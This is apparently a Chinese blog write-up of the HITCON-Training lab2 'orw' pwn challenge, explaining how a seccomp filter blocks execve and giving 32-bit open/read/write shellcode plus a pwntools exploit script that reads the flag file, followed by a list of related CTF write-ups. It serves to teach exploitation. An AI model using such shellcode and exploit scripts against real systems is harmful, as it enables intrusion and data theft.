HITCON-Training-master lab2 wp

最新推荐文章于 2023-09-14 20:43:20 发布
最新推荐文章于 2023-09-14 20:43:20 发布
阅读量682 收藏 2
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zszcr/article/details/79808044
版权

查看了下防护机制


发现开启了Canary,但是没关系,它没开启堆栈不可执行,说明 这是一道shell code题

简单跑了一下程序,发现输出了一句话:give me you shellcode

ida反编译查看了下代码


代码逻辑也很简单,你输入一段shellcode,然后去执行它

我随便去网上找了一段shellcode,输入后发现不行,说明它不是单纯的让我们输入shellcode

查看了一下orw_seccomp()函数


发现它里面调用了 prctl()函数,查了一番这个函数是做什么用的

prctl()是用来控制进程的系统调用

在这里它限制了进程使用某些系统调用 ,所以我们不可以通过execve的shellcode来获取flag,

这里我们通过 open(),read(),write()三个函数的系统调用来获取flag

这 三个函数要调用的参数可以在http://syscalls.kernelgrok.com/上查到

open() :eax->0x5 (系统调用号);ebx->(file_name_string);ecx->(flags 访问权限) ;edx->(mode如果创建新文件,则包含表示UNIX权限的整数值)

read(3,file,0x30): eax->0x3;ebx->(fd 文件句柄 0x3) ;ecx->(files_name_string);edx->(count 读取长度)

write(1,file,0x30):eax->0x4;ebx->(fd 文件句柄  0x1) ;ecx->(files_name_string);edx->(count 输出长度)

汇编代码:(intel风格)

xor ecx,ecx
mov  eax,0x5
push ecx
push 0x67616c66 (flag的十六进制形式,因为是小段显示所以要倒过来)
mov ebx,esp
xor edx,edx
int 0x80

mov eax,0x3
mov ecx,ebx
mov ebx,0x3
mov dl,0x30
int 0x80

mov eax,0x4
mov bl,0x1
int 0x80

exp:

#!/usr/bin/env python
# -*-: coding: UTF-8 -*-
from pwn import*
p = process('./orw.bin')
shellcode = '''
xor ecx,ecx
mov eax,0x5
push ecx
push 0x67616c66
mov ebx,esp
xor edx,edx
int 0x80

mov eax,0x3
mov ecx,ebx
mov ebx,0x3
mov dl,0x30
int 0x80

mov eax,0x4
mov bl,0x1
int 0x80
'''
payload = asm(shellcode)
p.recvuntil(":")
p.send(payload)
p.interactive()

zs0zrc
关注
专栏目录
HITCON-trainning&寒假做题记录
Peanuts
01-28 668
HITCON-trainning 2019.1.27 是一些好题目这几天准备重新做一遍预计两天之内完成现在做到lab7 题目地址:https://github.com/scwuaptx/HITCON-Training lab1 比较简单的逆向题这里就不贴代码了,就是一个疑惑解码 lab2 一个普通的int0x80的一个shellcode编写这里就不多讲了感觉没有什么 lab3 ret2sc 原理比...
HITCON Training Lab2 Writeup
博客
06-28 188
首先利用checksec查看文件 运行文件,将同一文件中的asm文件作为参数输入: $ ./orw.bin Give my your shellcode:./orw.asm Segmentation fault (core dumped) 利用IDA查看反编译的情况: 别的都可以理解,但是这个orw_seccomp要进去看一下: 这个prctl是什么意思? #include <sys/prctl.h> intprctl( intoption,u...
hitcontraining_bamboobox
像初雪一样自由洒落
04-24 737
hitcontraining_bamboobox这道题有两种解题方式: house of force 参考:house of force unlink house of force(详解) 知识点 只要top chunk size够大,就能随意申请chunk 所以,如果有溢出能控制top chunk size,就可以修改其为-1(0xffffffff最大值),然后malloc(负数)可以向上申请,malloc(正数) 题目流程 程序一开始申请0x10的块,存放hello_message和.
HITCON-Training lab7(一道简单的格式化字符串读漏洞)
像初雪一样自由洒落
03-27 263
格式化字符串知道他的操作,可是做的一点也不熟练吧,,,BJDCTF上的r2t4不会啊,,,看不懂,,,所以就来补补格式化字符串的题目了,,,, 看到canary开启了,我还以为要泄漏canary呢,结果发现不用那么麻烦,,, 其实看下,思路很清晰,先让你输入东西,然后返回给你,然后你输入password,如果和程序中的一样,你就拿到flag了,, 所以输入的东西里面需要泄漏pa...
HITCON-Training-master lab5 wp
zszcr的博客
04-07 374
程序防护机制:开启了NX堆栈不可执行查看了下ida反编译的代码可以发现主函数十分简单,但是程序里却又十分多的函数,说明这是静态链接编译的程序要求输入一局话,可以发现在read函数处有明显的栈溢出漏洞,buf大小是20 ,但是read函数读取100个字节的数据我一开始是想直接用ROPgadget生成ropchain的,但是尝试过发现,它可以溢出的空间不足以放下ROPgadget生成的ropchain...
HITCON Training Lab3 Writeup
博客
06-29 154
首先看一下文件的基本属性: $ file ./ret2sc ./ret2sc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=31484b774646e78186848556eae669af027787ce, not stripped 利用checksec查看
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
CTF|HITCON-Training-master lab4 writeup (ret2libc题型)
skyattractive的博客
06-12 383
CTF|HITCON-Training-master lab4 writeup (ret2libc题型) 做题做题前先看看ctfwiki上对ret2libc的原理描述 原理 ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置(即函数对应的 got表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。 思路 总体思路就是我们遇到没有system没有"/bin/sh"的文件 我们
CTF|HITCON-Training-master lab3 writeup (ret2shellcode题型)
skyattractive的博客
06-12 298
CTF|HITCON-Training-master lab3 writeup (ret2shellcode题型) ret2shellcode题型 ret2shellcode,即控制程序执行 shellcode代码。 shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。 对于lab3 checksec显示所有保护都没有开启并且有可读可写可执行段(RWX) 显然read函数gets函数存在栈溢出 我们看到bss段中一个叫有name的部分即我们第一个输入的
CTF|HITCON-Training-master lab5 writeup(ret2syscall题型)
skyattractive的博客
06-12 396
CTF|HITCON-Training-master lab5 writeup 题目的文件名是“simplerop” 意思是对rop链的简单利用 shift+f12 查看后,题目既没有给system函数又没有‘/bin/sh’ 大致判断是CTFwiki上基本rop中的ret2syscall类型的题目 大致思路是, 在文件中需寻找有用的gadget 通过题目中存在的栈溢出 将‘/bin/sh’写入文件中的bss段(或者data段) 然后将执行流引导到bss上执行即可 因为文件是32位,‘/bin/sh’需
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理.....................................................................................................................................................................................................................
HITCON Training Lab4 Writeup
博客
06-30 161
首先查看文件的基本属性: 查看整个文件反编译出来的结果: int __cdecl main(int argc, const char **argv, const char **envp) { char **v3; // ST04_4@1 int v4; // ST08_4@1 __int16 v6; // [sp+12h] [bp-10Eh]@1 __int16 v7; // [sp+112h] [bp-Eh]@1 _DWORD *v8; // [sp+11Ch] [bp-
hitcontraining_uaf
z1r0的博客
12-10 1578
hitcontraining_uaf 查看保护 有uaf,还有后门函数 这里会将show的功能存放在堆里,没有pie所以思路就是将print_note_content这个功能改成magic就可以了,改完show一下就可以执行magic。 申请两个0x10堆, 释放掉,有uaf,没有清0。 这时再申请一个0x8的堆,因为fastbin,填充content时其实就改的是print_note_content。 content放入magic即可。 from pwn import * context(arc
hitcontraining_playfmt
最新发布
qq_62887641的博客
09-14 122
32位保护全关存在格式化字符串漏洞,并且是bss段,也就是非栈上的格式化字符串。
HITCON-Training lab5(自己构造rop)
像初雪一样自由洒落
03-12 371
看到静态链接,一顿欣喜,直接ropchain生成,栈溢出找出来就ok啦?然后后来发现并没有那么简单。。。 ================================================================================================ 【一段小插曲】 做题的时候突然很奇怪,nx开启,堆栈不可执行,为什么可以执行pop这些指令...
HITCON-Training lab8(格式化字符串写漏洞)
像初雪一样自由洒落
03-28 334
还在补格式化字符串漏洞的知识,,,,看到这道题的时候,有点懵,,,因为发现218不会整,,,看官方writeup也不太行,,, 先知社区上有篇讲的就很好了,,,nice,用了四种方法(最后一种没看懂,,,),,,看完,BJDCTF那道r2t4终于也明白了,感天动地,,,今天就写下前三种方法的种种,,, 顺便计算下偏移,反正都会用到 偏移是7 方法一 最简单的...
HITCON-training lab10 wp
qq_43409582的博客
01-30 1674
0x00 开始堆利用的学习了,先做第一入门题目,UAF漏洞利用。 0x01 看保护: 一个32位的开了canary和nx保护 0x02 ida分析 一个菜单有加、减、查看功能 看add是什么样子 1-2 .先会malloc一个8字节的空间,指向print_note_content函数,用来打印content。 3-4 .再malloc一个size用来存放你写入的content 再看看del_n...
use after free HITCON-training (lab 10 hacknote)
九层台
08-06 872
liu@liu-F117-F:~/1t/u18/文档/堆溢出学习/use after free$ checksec hacknote [*] '/home/liu/1t/u18/\xe6\x96\x87\xe6\xa1\xa3/\xe5\xa0\x86\xe6\xba\xa2\xe5\x87\xba\xe5\xad\xa6\xe4\xb9\xa0/use after free/hacknote' ...
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值